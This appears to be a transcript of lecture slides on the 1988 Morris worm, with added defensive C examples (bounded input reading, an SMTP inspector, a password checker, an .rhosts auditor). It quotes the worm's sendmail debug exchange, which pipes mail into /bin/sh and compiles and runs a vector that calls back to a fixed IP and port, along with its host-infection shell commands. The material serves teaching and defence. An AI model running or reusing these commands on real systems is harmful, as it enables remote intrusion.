Crisis And Aftermath
Transcript of Crisis And Aftermath

Contents
- Introduction
- Worm vs. Virus
- Worm History
- Example
- How the worm operated
- Crisis
- Aftermath

Worm vs. Virus

|                        | Worm                                | Virus                                           |
|------------------------|-------------------------------------|-------------------------------------------------|
| Can run independently? | Yes                                 | No                                              |
| How does it operate?   | Consumes the resources of its host  | Inserts itself into one of the host's programs  |
| When is it invoked?    | By itself                           | When the infected program is running            |

Worm History
- 1975: John Brunner's science fiction
- 1981: Xerox PARC experiments
- 1988: the Worm started*
- …
- 2003: SQL Slammer worm (the "1.25 Internet Crisis")

'03 1.25 Internet Crisis
On January 25, 2003, the Slammer worm, which targeted Microsoft SQL Server, became active. It sent 404 bytes to 1434/udp (the SQL Server Resolution Service port).

finger
- finger allows a user to obtain information about other users over TCP/IP.
- Common Unix systems run a finger daemon (fingerd).
- The worm broke the fingerd program by a "buffer overrun".
- The worm exploited the gets() call.

finger
Example)
- In gets(), we set a buffer of 10 (e.g. char buff[10];).
- Typing over 11 characters causes a buffer overflow.
- When a buffer overflow occurs:
  - Normal case: core dumped and exit.
  - The worm: overwrites the stack information and causes a return into the worm's program code, so the worm can run on its own.
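The defect the slide describes is that gets() has no length argument, so whatever arrives on the connection is written past the end of char buff[10]. The following is an added example, not code from the slides or from fingerd: a bounds-checked request reader built on fgets() that treats a line longer than the buffer as an error to be rejected and drained, rather than silently truncated or allowed to overrun. The function names, the 10-byte buffer and the use of fmemopen() to stand in for a network socket are assumptions of this example.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <string.h>

#define REQ_BUF 10   /* the same tiny buffer as on the slide: char buff[10] */

/* Read one request line into buf (capacity bufsz).
 * Returns  1 on a complete line that fit in the buffer (newline stripped),
 *          0 on EOF with no data,
 *         -1 if the line was longer than the buffer; the rest of that line is
 *            discarded so the next call starts fresh, and buf is emptied.
 * Unlike gets(), nothing is ever written past buf[bufsz - 1]. */
int read_request(FILE *in, char *buf, size_t bufsz)
{
    if (bufsz < 2 || fgets(buf, (int)bufsz, in) == NULL)
        return 0;                                  /* EOF or read error */

    char *nl = strchr(buf, '\n');
    if (nl != NULL) {
        *nl = '\0';                                /* line fit: strip newline */
        return 1;
    }

    /* No newline: fgets() filled the buffer. Peek at the next byte to tell
     * "line exactly filled the buffer" from "line is too long". */
    int c = fgetc(in);
    if (c == EOF || c == '\n')
        return 1;

    while (c != EOF && c != '\n')                  /* drain the overlong line */
        c = fgetc(in);
    buf[0] = '\0';
    return -1;
}

/* Test helper: feed a constructed request through an in-memory stream,
 * standing in for the socket a finger daemon would read from. */
int classify_request(const char *input)
{
    char buf[REQ_BUF];
    FILE *in = fmemopen((void *)input, strlen(input), "r");
    if (in == NULL)
        return -2;
    int rc = read_request(in, buf, sizeof buf);
    fclose(in);
    return rc;
}

int main(void)
{
    /* Both inputs are constructed: a normal finger query and an overlong one. */
    printf("\"root\"   -> %d\n", classify_request("root\n"));
    printf("11 x 'A' -> %d\n", classify_request("AAAAAAAAAAA\n"));
    return 0;
}
```

The rejected case is the important one: a daemon that reads with fgets() but ignores the missing newline would process a truncated request and leave the remainder of the line to be misread as the next request, so the drain-and-reject step belongs with the bounded read.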

sendmail
- sendmail is a mailer program that routes mail in a heterogeneous network.
- With the debug option, a tester can run programs to display the state of the mail system without sending mail or establishing a separate login connection.
- The worm used the debug option to invoke a set of commands instead of a user address.

password
Password mechanism in a UNIX system:
1. Enter the password
2. Encrypt it with the "encryption standard algorithm"
3. Compare with the previously encrypted password
4. If they are the same, access is granted

Trusted logins avoid having to repeatedly type passwords: rlogin runs without password checking.

How worm operated
- Main Program: collects information on other machines in the network
- Vector Program: tries to infect other machines with the information obtained

How worm operated (cont'd)
How it works:
1. Connect to the target
2. Transfer the source code of each part
3. Compile it
4. Run it
5. Collect information
6. Try to connect to other machines

Step 1, 2 : Connection & Send
1. A socket is established between the vector and the infecting machine
2. The vector tries one of two methods:
   1. Using a TCP connection to /bin/sh
   2. Using SMTP

Step 2 : Connection (cont'd)
Via /bin/sh:

```
echo … > x14481910.c
[text of vector..]
```

Via SMTP:

```
debug
mail from: </dev/null>
rcpt to: <"|sed -e '1,/^$/'d | /bin/sh ; exit 0">
data
cd /usr/tmp
cat > x14481910.c << 'EOF'
[text of vector ..]
EOF
cc -o x14481910 x14481910.c
./x14481910 128.32.134.16 32341 8712440
rm -f x14481910 x14481910.c
quit
```
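Two things in the exchange above are what a mail administrator or log reviewer would look for: the server accepting the debug verb at all (the sendmail slide explains it was a tester's option), and a RCPT TO whose mailbox begins with a pipe, meaning a command to run rather than a user address. The following is an added example, not code from the slides or from sendmail: a small inspector that runs over an SMTP command transcript and reports those two conditions as flag bits. The transcripts, function names and flag values are constructed for this example.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define FLAG_DEBUG_CMD 0x1   /* the "debug" verb was issued */
#define FLAG_PIPE_RCPT 0x2   /* RCPT TO:<|cmd> or RCPT TO:<"|cmd"> was issued */

/* Case-insensitive test that s begins with prefix. */
static int has_prefix_ci(const char *s, const char *prefix)
{
    for (; *prefix != '\0'; s++, prefix++)
        if (tolower((unsigned char)*s) != tolower((unsigned char)*prefix))
            return 0;
    return 1;
}

static const char *skip_ws(const char *s)
{
    while (*s == ' ' || *s == '\t')
        s++;
    return s;
}

/* Inspect one SMTP command line and return the FLAG_* bits it triggers. */
int inspect_smtp_line(const char *line)
{
    int flags = 0;
    line = skip_ws(line);

    if (has_prefix_ci(line, "debug")) {
        const char *p = line + 5;              /* whole word only, not "debugging" */
        if (*p == '\0' || *p == '\r' || *p == '\n' || *p == ' ')
            flags |= FLAG_DEBUG_CMD;
    }
    if (has_prefix_ci(line, "rcpt to:")) {
        const char *p = skip_ws(line + 8);
        if (*p == '<')
            p++;
        p = skip_ws(p);
        if (*p == '"')                         /* quoted local part, as in the worm's request */
            p++;
        if (*p == '|')                         /* mailbox is a program, not an address */
            flags |= FLAG_PIPE_RCPT;
    }
    return flags;
}

/* Inspect a newline-separated transcript; OR together the flags of every line. */
int inspect_smtp_transcript(const char *transcript)
{
    int flags = 0;
    char line[512];
    const char *p = transcript;
    while (*p != '\0') {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        if (len >= sizeof line)
            len = sizeof line - 1;             /* clip an absurdly long line */
        memcpy(line, p, len);
        line[len] = '\0';
        flags |= inspect_smtp_line(line);
        if (nl == NULL)
            break;
        p = nl + 1;
    }
    return flags;
}

/* Constructed transcripts: the shape shown on the slide, and an ordinary session. */
static const char *suspicious_session =
    "debug\n"
    "mail from: </dev/null>\n"
    "rcpt to: <\"|sed -e '1,/^$/'d | /bin/sh ; exit 0\">\n"
    "data\n";

static const char *normal_session =
    "HELO mailhost\n"
    "MAIL FROM:<alice@example.com>\n"
    "RCPT TO:<bob@example.com>\n"
    "DATA\n";

int main(void)
{
    printf("suspicious session flags: 0x%x\n", inspect_smtp_transcript(suspicious_session));
    printf("normal session flags:     0x%x\n", inspect_smtp_transcript(normal_session));
    return 0;
}
```

Either flag on its own is worth an alert; the fix at the time was to ship sendmail with the debug command disabled, and a recipient that starts with a pipe has no business arriving over the network in any configuration.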

Step 3 : file transfer
- The vector connected to the 'server' and transferred 3 files:
  - Sun3 and VAX binary versions of the worm
  - Source code of the vector
- The vector then became a shell (using execl) with its input and output still connected to the server

Step 4 : Infect Host
The server sent the command stream to the connected shell:

```sh
PATH=/bin:/usr/bin:/usr/ucb
rm -f sh
if [ -f sh ]
then p=x14481910
else p=sh
fi
```

Then, for each binary:

```sh
cc -o $p x14481910,sun3.o
./$p -p $$ x14481910,sun3.o x14481910,vax.o x14481910,l1.c
rm -f $p
```

Step 5 : Hide Worm
The new worm hides itself by:
- Obscuring its argument vector
- Unlinking the binary version of itself
- Killing its parent
- Reading the worm binary into memory and encrypting it, then deleting the file from disk

Step 6 : Information gathering
The worm gathers information about:
- Network interfaces
- Hosts to which the local machine was connected
It uses ioctl and netstat, and builds lists of these in memory.

Step 7 : reachability
- Connection status: directly connected? Host type (gateway or local host)?
- Tries to connect using telnet and rexec

Step 8 : Infection Attempts
- Attack via rsh (/usr/bin/rsh, /bin/rsh)
  - Can be used without password checking
  - If successful, go to step 1 and step 2.1
- Finger: stack overflow attack
  - The return address in the stack frame of the main routine is changed to execve("/bin/sh", 0, 0)
  - If successful, go to step 1 and step 2.1
- Connection to SMTP: step 2.2

Step 9 : infected machine information
1. Collect info from /etc/hosts.equiv and /.rhosts, /etc/passwd, .forward
2. Crack passwords using simple choices
3. Crack passwords with an internal dictionary of words
4. Crack passwords with /usr/dict/words
5. Loop forever trying to infect hosts in its internal tables
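Steps 2 to 4 work only because users choose passwords that are derived from their own account details or are plain dictionary words. The defensive counterpart is a proactive check applied when a password is set. The following is an added example, not code from the slides: it rejects the empty password, the account name (also doubled or reversed), any word from the GECOS full-name field, and anything in a word list. The exact list of "simple choices" is an assumption of this example, and the embedded word list is a constructed stand-in for /usr/dict/words.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

enum pw_verdict {
    PW_OK = 0,
    PW_EMPTY,                /* no password at all */
    PW_IS_USERNAME,          /* same as the account name */
    PW_IS_USERNAME_TWICE,    /* account name repeated, e.g. "bobbob" */
    PW_IS_USERNAME_REVERSED, /* account name backwards */
    PW_IS_GECOS_NAME,        /* a word from the GECOS (full name) field */
    PW_IN_DICTIONARY         /* found in the word list */
};

/* Constructed stand-in for an internal word list or /usr/dict/words. */
static const char *word_list[] = { "password", "secret", "wizard", "welcome", "beowulf", NULL };

/* Case-insensitive string equality. */
static int eq_ci(const char *a, const char *b)
{
    for (; *a != '\0' && *b != '\0'; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return 0;
    return *a == '\0' && *b == '\0';
}

/* Return PW_OK if the candidate password survives every check, else the
 * first reason it fails. gecos is the /etc/passwd comment field,
 * e.g. "Robert Smith,Room 12". */
int check_password(const char *username, const char *gecos, const char *password)
{
    char buf[256];
    size_t ulen = strlen(username), plen = strlen(password), i;

    if (plen == 0)
        return PW_EMPTY;
    if (eq_ci(password, username))
        return PW_IS_USERNAME;

    if (ulen > 0 && 2 * ulen < sizeof buf) {         /* "bob" -> "bobbob" */
        memcpy(buf, username, ulen);
        memcpy(buf + ulen, username, ulen + 1);      /* copies the NUL too */
        if (eq_ci(password, buf))
            return PW_IS_USERNAME_TWICE;
    }
    if (ulen > 0 && ulen < sizeof buf) {             /* "dave" -> "evad" */
        for (i = 0; i < ulen; i++)
            buf[i] = username[ulen - 1 - i];
        buf[ulen] = '\0';
        if (eq_ci(password, buf))
            return PW_IS_USERNAME_REVERSED;
    }
    if (strlen(gecos) < sizeof buf) {                /* every space/comma token */
        strcpy(buf, gecos);
        for (char *tok = strtok(buf, " ,"); tok != NULL; tok = strtok(NULL, " ,"))
            if (eq_ci(password, tok))
                return PW_IS_GECOS_NAME;
    }
    for (i = 0; word_list[i] != NULL; i++)
        if (eq_ci(password, word_list[i]))
            return PW_IN_DICTIONARY;
    return PW_OK;
}

int main(void)
{
    /* Constructed account: login "bob", GECOS "Robert Smith,Room 12". */
    const char *tries[] = { "", "bob", "bobbob", "smith", "wizard", "Tr0ub4dor&3" };
    for (size_t i = 0; i < sizeof tries / sizeof tries[0]; i++)
        printf("%-12s -> verdict %d\n", tries[i], check_password("bob", "Robert Smith,Room 12", tries[i]));
    return 0;
}
```

A real deployment would read the word list from /usr/dict/words (or a larger list) instead of the embedded array; the point is that every guess class the worm is described as using is cheap to refuse at password-change time.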

Step 10
- Break into remote machines: read .forward and .rhosts for user accounts
- Create the remote shell:
  - Remote rexec service: rexec to the current host
  - rsh to the remote host: relies on the .rhosts or hosts.equiv file on the remote server
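Both the password slide (rlogin runs without password checking) and this step come down to the contents of hosts.equiv and .rhosts: whatever those files trust is reachable with no credential at all. The following is an added example, not code from the slides: an auditor for such files that flags the "+" wildcard in the host or user field and any fully qualified host outside the local domain. The sample file is constructed; the local-domain rule and the treatment of unqualified short names as local are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>

/* Risk bits for one hosts.equiv / .rhosts entry. */
#define RH_ANY_HOST     0x1   /* host field is "+": every host is trusted */
#define RH_ANY_USER     0x2   /* user field is "+": every user on that host */
#define RH_FOREIGN_HOST 0x4   /* fully qualified host outside our own domain */

/* Audit one line of the form "host [user]". Comments and blank lines score 0.
 * Qualified hosts not under local_domain are flagged; unqualified short names
 * are accepted as local (an assumption of this example). */
int audit_rhosts_line(const char *line, const char *local_domain)
{
    char host[128] = "", user[128] = "";
    int n = sscanf(line, "%127s %127s", host, user);
    int risk = 0;

    if (n < 1 || host[0] == '#')
        return 0;

    if (strcmp(host, "+") == 0) {
        risk |= RH_ANY_HOST;
    } else if (strchr(host, '.') != NULL) {
        size_t hl = strlen(host), dl = strlen(local_domain);
        int in_domain = hl > dl + 1
                     && host[hl - dl - 1] == '.'
                     && strcmp(host + hl - dl, local_domain) == 0;
        if (!in_domain)
            risk |= RH_FOREIGN_HOST;
    }
    if (n == 2 && strcmp(user, "+") == 0)
        risk |= RH_ANY_USER;
    return risk;
}

/* Audit a whole file's contents. Returns the number of risky entries and,
 * if risk_union is not NULL, ORs every risk bit seen into it. */
int audit_rhosts_file(const char *contents, const char *local_domain, int *risk_union)
{
    int count = 0, all = 0;
    char line[256];
    const char *p = contents;
    while (*p != '\0') {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        if (len >= sizeof line)
            len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        int r = audit_rhosts_line(line, local_domain);
        if (r != 0) {
            count++;
            all |= r;
        }
        if (nl == NULL)
            break;
        p = nl + 1;
    }
    if (risk_union != NULL)
        *risk_union = all;
    return count;
}

/* Constructed hosts.equiv for a fictional site whose domain is example.edu. */
static const char *sample_hosts_equiv =
    "# trusted hosts for this department\n"
    "cs.example.edu\n"
    "mailhost\n"
    "+\n"
    "gw.example.edu +\n"
    "lab7.example.org bob\n";

int main(void)
{
    int bits = 0;
    int n = audit_rhosts_file(sample_hosts_equiv, "example.edu", &bits);
    printf("%d risky entries, risk bits 0x%x\n", n, bits);
    return 0;
}
```

The bare "+" line is the worst case: it makes every host on the network a trusted login source, which is exactly the condition the rsh attempt in step 8 needs.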

Characteristics
- Checks for other worms running
- One of 7 worms becomes immortal
- Forks itself and kills the parent
- Re-infects the same machine every 12 hours
- There is no stop code

Aftermath
- The first worm
- Around 6000 major UNIX machines were infected (10% of the network at that time)
- Important nation-wide gateways were shut down
- Topic debated: punishment

Then …
- Robert T. Morris was arrested
- He just wanted to make a tool to gauge the size of the Internet
- 3 years probation, a fine, community service
- The Computer Emergency Response Team was established